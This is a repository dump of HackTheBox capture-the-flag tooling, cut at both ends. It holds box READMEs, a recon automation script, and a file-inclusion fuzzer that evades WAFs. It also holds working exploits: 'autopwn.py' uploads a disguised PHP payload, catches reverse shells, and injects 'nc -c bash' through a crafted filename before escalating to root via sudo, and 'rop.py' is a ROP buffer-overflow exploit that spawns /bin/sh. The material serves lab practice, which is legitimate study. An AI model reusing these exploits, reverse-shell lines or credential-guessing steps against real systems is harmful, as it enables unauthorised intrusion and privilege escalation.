bytearray(len(a)) 10 | for i in range(len(a)): 11 | a[i] = c[i] ^ b[i] 12 | print a 13 | #2nd block 14 | b = bytearray(f.read(8)) 15 | a = bytearray(len(a)) 16 | for i in range(len(a)): 17 | a[i] = c[i] ^ b[i] 18 | print a 19 | 20 | #3rd block 21 | b = bytearray(f.read(8)) 22 | a = bytearray(len(a)) 23 | for i in range(0,len(a)): 24 | a[i] = c[i] ^ b[i] 25 | print a 26 | 27 | #4th block 28 | b = bytearray(f.read(8)) 29 | a = bytearray(len(a)) 30 | for i in range(len(a)): 31 | a[i] = c[i] ^ b[i] 32 | print a 33 | -------------------------------------------------------------------------------- /Boxes/Networked/README.md: -------------------------------------------------------------------------------- 1 | Easy box having apache misconfiguration while handling the files on the server and command execution vulnerability in network scripts. 2 | 3 | 4 | References: 5 | ------------ 6 | 1. https://blog.remirepo.net/post/2013/01/13/PHP-and-Apache-SetHandler-vs-AddHandler 7 | 2. https://www.nds.ruhr-uni-bochum.de/media/attachments/files/2012/11/File-in-the-hole.pdf 8 | 3. https://seclists.org/fulldisclosure/2019/Apr/24 9 | -------------------------------------------------------------------------------- /Boxes/Networked/autopwn.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from pwn import * 4 | import requests 5 | import subprocess 6 | import netifaces as ni 7 | 8 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 9 | 10 | 11 | 12 | def shell(user): 13 | data="-----------------------------169128251116063042041106433445\r\nContent-Disposition: form-data; name=\"myFile\"; filename=\"test.php.png\"\r\nContent-Type: image/png\r\n\r\nGIF87a;\r\n-----------------------------169128251116063042041106433445\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\ngo!\r\n-----------------------------169128251116063042041106433445--\r\n".format(ip) 14 | r = requests.post('http://10.10.10.146/upload.php',data=data,proxies={'http':'http://127.0.0.1:8080'},headers={'Content-Type':'multipart/form-data;boundary=---------------------------169128251116063042041106433445'}) 15 | log.info('Triggering Shell') 16 | l = listen(1337) 17 | image=ip.replace('.','_')+'.php.png' 18 | subprocess.Popen(['/bin/curl','http://10.10.10.146/uploads/{}'.format(image)],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 19 | l.wait_for_connection() 20 | log.info("Got www-data shell") 21 | if user=="www-data": 22 | l.sendline("/usr/bin/python -c 'import pty;pty.spawn(\"/bin/bash\")'") 23 | l.interactive() 24 | else: 25 | l.sendline("cd /var/www/html/uploads && touch -- ';nc -c bash {} 1234'".format(ip)) 26 | p = listen(1234).wait_for_connection() 27 | log.info("Got guly shell") 28 | p.sendline("/usr/bin/python -c 'import pty;pty.spawn(\"/bin/bash\")'") 29 | if user=="guly": 30 | p.interactive() 31 | else: 32 | p.sendline("sudo -u root /usr/local/sbin/changename.sh") 33 | p.recvline() 34 | p.sendline("a bash") 35 | p.recvline() 36 | p.sendline("c") 37 | p.recvline() 38 | p.sendline("d") 39 | p.recvline() 40 | p.sendline("d") 41 | p.sendline("/usr/bin/python -c 'import pty;pty.spawn(\"/bin/bash\")'") 42 | p.interactive() 43 | 44 | if __name__=="__main__": 45 | print ''' .----. 46 | .---------. | == | 47 | |.-"""""-.| |----| 48 | || || | == | 49 | || || |----| 50 | |'-.....-'| |::::| 51 | `"")---(""` |___.| 52 | /:::::::::::\ _ 53 | /:::=======:::\ `\`\ 54 | 55 | `---------------` '-' 56 | Networked by MrR3boot''' 57 | print "1. www-data" 58 | print "2. guly" 59 | print "3. root" 60 | input = raw_input("> ").strip() 61 | if input == "1": 62 | shell('www-data') 63 | elif input == "2": 64 | shell("guly") 65 | else: 66 | shell("root") 67 | -------------------------------------------------------------------------------- /Boxes/Onetwoseven/README.md: -------------------------------------------------------------------------------- 1 | Breaking SFTP and getting access to hidden user on 127.0.0.1 and tunnelling to access admin panel on local port further escalating to root using APT MITM injection. 2 | 3 | https://youtu.be/RN_mTtLPzFE 4 | -------------------------------------------------------------------------------- /Boxes/Player/Player.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrR3boot/HackTheBox/87c2a87d584c93851dc1d8f5e61d895001a22214/Boxes/Player/Player.pdf -------------------------------------------------------------------------------- /Boxes/Player/README.md: -------------------------------------------------------------------------------- 1 | 1. Intended way : https://www.youtube.com/watch?v=rT5KnuwAFPQ 2 | 2. Unintended : https://www.youtube.com/watch?v=nqYJxEHLM60 3 | -------------------------------------------------------------------------------- /Boxes/README.md: -------------------------------------------------------------------------------- 1 | Don't Just Think Outside The Box. Burn The Box and Invite Everyone to The Party :) 2 | ----------------------------------------------------------------------------------- 3 | 4 | I'll keep it short and place concepts, scripts, techniques Used in Solving the Boxes. 5 | 6 | I may not interested in writing much detailed writeups but for my reference i'll note my steps in here for every retired box. 7 | 8 | Detailed walkthroughs will be available on my channel [MrR3boot](https://www.youtube.com/channel/UCW7iWOd3v1nYb-wgECvSF8w) 9 | -------------------------------------------------------------------------------- /Boxes/Safe/README.md: -------------------------------------------------------------------------------- 1 | Easy box involving binary exploitation for user part and then privilege escalation using keepass database. 2 | 3 | https://www.youtube.com/watch?v=368MzIg2GFE 4 | -------------------------------------------------------------------------------- /Boxes/Safe/rop.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #p = process("./myapp") 4 | p = remote(host='10.10.10.147',port='1337') 5 | bss = p64(0x00404048) 6 | system = p64(0x00401040) 7 | gets = p64(0x00401060) 8 | pop_rdi = p64(0x000000000040120b) 9 | 10 | buf = "A"*120 11 | buf += pop_rdi 12 | buf += bss 13 | buf += gets 14 | buf += pop_rdi 15 | buf += bss 16 | buf += system 17 | 18 | p.sendline(buf) 19 | p.sendline('/bin/sh') 20 | 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /Boxes/Sizzle/README.md: -------------------------------------------------------------------------------- 1 | This box will burn everyone's head as it's pure windows and having AV, Group Policy checks in place. I recommend Red Team members to go ahead and practice this machine. 2 | 3 | https://www.youtube.com/watch?v=PcPF1eISUs0&t=274s 4 | -------------------------------------------------------------------------------- /Boxes/Writeup/README.md: -------------------------------------------------------------------------------- 1 | Nice box by jkr which involves SQL Injection to fetch SSH Credentials and privesc using run-parts binary. We will also explore the unintended path by hijacking the perl module. 2 | 3 | https://youtu.be/g22ftc5KUFk 4 | -------------------------------------------------------------------------------- /Enumeration/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Enumeration/README.md: -------------------------------------------------------------------------------- 1 | # WakeUp 2 | 3 | This script automates below tasks. 4 | 1. Port scan with Nmap of all ports 5 | 2. Checks web ports and enum files,folders 6 | 3. Checks smb port and writes output of anonymous shares. 7 | 4. Checks ftp port and writes output of anonymous access. 8 | -------------------------------------------------------------------------------- /Enumeration/wakeup.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import subprocess 3 | import sys 4 | import os 5 | import re 6 | import socket 7 | import pexpect 8 | from ftplib import FTP 9 | from threading import Thread 10 | from time import sleep 11 | 12 | #I always love to see my script colorful with banners 13 | print '''\033[1;31;40m 14 | _ _ __ 15 | __ __ __ __ _ | |__ ___ _ _ | '_ \ 16 | \ V V // _` | | / / / -_) | \| | | .__/ 17 | \_/\_/ \__,_| |_\_\ \___| \_,_| |_|__ 18 | _|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 19 | "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 20 | 21 | \033[1;36;40mLet's Hack The Boxes \033[1;33;40mMrR3boot\033[1;32;40m 22 | ╔══╗ 23 | ╚╗╔╝ 24 | ╔╝(¯`v´¯) 25 | ╚══`.¸.Hacking...\033[1;37;40m''' 26 | 27 | 28 | def portscan(ip,machine,path): 29 | print "\n[+] Going for port scan in background" 30 | subprocess.Popen(["mkdir","-p","{}/{}/nmap".format(path,machine)]) 31 | cmd = "/usr/bin/nmap -sV -sC -p- -Pn --max-retries=0 -oA {}/{}/nmap/tcp-scan {} >/dev/null &".format(path,machine,ip) 32 | subprocess.call(cmd,shell=True) 33 | cmd = "/usr/bin/nmap -sV -sC -p- -sU -Pn --max-retries=0 -oA {}/{}/nmap/udp-scan {} >/dev/null &".format(path,machine,ip) 34 | subprocess.call(cmd,shell=True) 35 | 36 | def webscan(ip,machine,path): 37 | print "\n\033[1;37;40m[+] Checking for web related stuff" 38 | sleep(3) 39 | #To save time just check 80,443 with curl and dig in 40 | p = subprocess.Popen(["curl","--max-time","10","http://{}".format(ip)],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 41 | stdout,stderr = p.communicate() 42 | if stdout!="": 43 | subprocess.Popen(["mkdir","{}/{}/web".format(path,machine)]) 44 | print " \033[1;32;40m[*] Port 80 is up. Going in" 45 | cmd = '''gobuster -s 200,207,301,302,400,401,403,500 -np -fw -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://{} -x php,asp,aspx,jsp,docx,txt,zip -t 10 -o {}/{}/web/go_http >/dev/null &'''.format(ip,path,machine) 46 | subprocess.call(cmd,shell=True,stdout=None) 47 | else: 48 | print " \033[1;31;40m[-] Port 80 is down. Checking SSL" 49 | p = subprocess.Popen(["curl","--max-time","10","-k","https://{}".format(ip)],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 50 | stdout,stderr = p.communicate() 51 | if stdout!="": 52 | subprocess.Popen(["mkdir","{}/{}/web".format(path,machine)]) 53 | print " \033[1;32;40m[*] Port 443 is up. Going in" 54 | cmd = '''gobuster -s 200,207,301,302,400,401,403,500 -k -fw -q -np -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://{} -x php,asp,aspx,jsp,docx,txt,zip -t 10 -o {}/{}/web/go_https >/dev/null &'''.format(ip,path,machine) 55 | subprocess.call(cmd,shell=True,stdout=None) 56 | else: 57 | print " \033[1;31;40m[-] Port 443 is down. Giving up" 58 | 59 | def smbscan(ip,machine,path): 60 | print "\n\033[1;37;40m[+] Checking if OS is Win/Linux" 61 | cmd = """ping -c5 {} | grep -m 1 ttl | cut -d '=' -f3 | cut -d ' ' -f1""".format(ip) 62 | p = subprocess.Popen(cmd, stdout=subprocess.PIPE,shell=True) 63 | output,err = p.communicate() 64 | if output.strip("\n") != "128" and output.strip("\n") != "32" and output.strip("\n")!= "127": 65 | print " \033[1;33;40m[-]It seems to be Linux. Double check if smb is open on Linux" 66 | else: 67 | print " \033[1;32;40m[+] It's Windows Machine. Checking SMB Port" 68 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 69 | s.settimeout(10) 70 | status = s.connect_ex(('{}'.format(ip),445)) 71 | if status == 0: 72 | print " \033[1;32;40m[+] Port open. Checking shares" 73 | s.close() 74 | cmd = "mkdir {}/{}/smb".format(path,machine) 75 | subprocess.Popen(cmd,shell=True) 76 | creds = ['anonymous:anonymous','root:root','anonymous:""','root:""'] 77 | for cred in creds: 78 | user,passwd = cred.split(":") 79 | cmd = '''smbmap -u {} -p {} -H {}'''.format(user,passwd,ip) 80 | p = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE) 81 | stdout,err = p.communicate() 82 | if re.search(r'Authentication error',stdout): 83 | print " \033[1;31;40m[-] We don't have access to shares with {}:{}".format(user,passwd) 84 | else: 85 | print " \033[1;32;40m[*] Found shares accessible using {}. Writing Results..".format(cred) 86 | f = open("{}/{}/smb/scan-{}-{}".format(path,machine,user,passwd),"w") 87 | f.write(stdout) 88 | f.close() 89 | else: 90 | print " \033[1;31;40m[-] Port 445 is down. Giving up" 91 | 92 | def ftpscan(ip,machine,path): 93 | sleep(4) 94 | print "\n\033[1;37;40m[+] Checking if FTP is up" 95 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 96 | s.settimeout(10) 97 | status = s.connect_ex(('{}'.format(ip),21)) 98 | if status == 0: 99 | print " \033[1;32;40m[*] Port 21 is open. Checking anonymous access" 100 | s.close() 101 | ftp = FTP('{}'.format(ip)) 102 | try: 103 | ftp.login() 104 | data = [] 105 | ftp.getwelcome(data.append) 106 | ftp.dir(data.append) 107 | ftp.quit() 108 | cmd = "mkdir {}/{}/ftp".format(path,machine) 109 | subprocess.Popen(cmd, shell=True) 110 | sleep(3) 111 | f = open("{}/{}/ftp/anon-login".format(path,machine),"w") 112 | for a in data: 113 | f.write(a) 114 | f.close() 115 | except: 116 | print " \033[1;31;40m[-] Login failed." 117 | else: 118 | print " \033[1;31;40m[-] Port 21 is closed. Double check port scan due to resets from fellow hackers.." 119 | 120 | 121 | if __name__=="__main__": 122 | if len(sys.argv[1:])<2: 123 | print "\nUsage: python wakeup.py \n" 124 | else: 125 | ip = sys.argv[2] 126 | machine = sys.argv[1] 127 | #Modify this line to your need. 128 | path = "" 129 | if path == "": 130 | print "\nPlease open the script and setup the path to store output" 131 | else: 132 | t1 = Thread(target=portscan,args=(ip,machine,path,)) 133 | t2 = Thread(target=webscan,args=(ip,machine,path,)) 134 | t3 = Thread(target=smbscan,args=(ip,machine,path,)) 135 | t4 = Thread(target=ftpscan,args=(ip,machine,path,)) 136 | t1.start() 137 | t2.start() 138 | t1.join() 139 | t2.join() 140 | t3.start() 141 | t3.join() 142 | t4.start() 143 | t4.join() 144 | #subprocess making terminal fuzzy. Reset it for normal use 145 | subprocess.call(["stty","sane"]) 146 | print "\n\033[1;37;40m[*] Job Done. Check {} for results..".format("{}".format(path) + machine) 147 | -------------------------------------------------------------------------------- /File Inclusion/README.md: -------------------------------------------------------------------------------- 1 | # Fuzz My Files: 2 | It checks for file inclusion vulnerabilities for a given url with choosen wordlist. It also has a trick to defeat certain waf checks by randomizing User-Agent header for every attempt. 3 | 4 | ## Usage 5 | ![logo](https://github.com/MrR3boot/HackTheBox/blob/master/File%20Inclusion/usage.png) 6 | 7 | 8 | ## In Action 9 | ![logo](https://github.com/MrR3boot/HackTheBox/blob/master/File%20Inclusion/action.png) 10 | -------------------------------------------------------------------------------- /File Inclusion/action.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrR3boot/HackTheBox/87c2a87d584c93851dc1d8f5e61d895001a22214/File Inclusion/action.png -------------------------------------------------------------------------------- /File Inclusion/fmf.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import random 4 | import requests 5 | from bs4 import BeautifulSoup 6 | 7 | def banner(): 8 | print '''\n\033[1;31;40m _,---. ___ _,---. 9 | .-`.' , \ .-._ .'=.'\ .-`.' , \ 10 | /==/_ _.-'/==/ \|==| |/==/_ _.-' 11 | /==/- '..-.|==|,| / - /==/- '..-. 12 | |==|_ , /|==| \/ , |==|_ , / 13 | |==| .--' |==|- , _ |==| .--' 14 | |==|- | |==| _ /\ |==|- | 15 | /==/ \ /==/ / / , /==/ \ 16 | `--`---' `--`./ `--``--`---' 17 | \033[1;34;40mF\033[1;31;40muzz \033[1;34;40mM\033[1;31;40my \033[1;34;40mF\033[1;31;40miles \033[1;33;40mBy MrR3boot\033[1;32;40m \n''' 18 | 19 | def lfi(url,payload,length,cookies,response): 20 | url = url+payload 21 | int = random.randint(0,10000000) 22 | r = requests.get(url,cookies=cookies,headers={'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101{} Firefox/60.0'.format(int)}) 23 | if r.headers['Content-Length']!=length: 24 | maxlen=len(r.text) if len(response)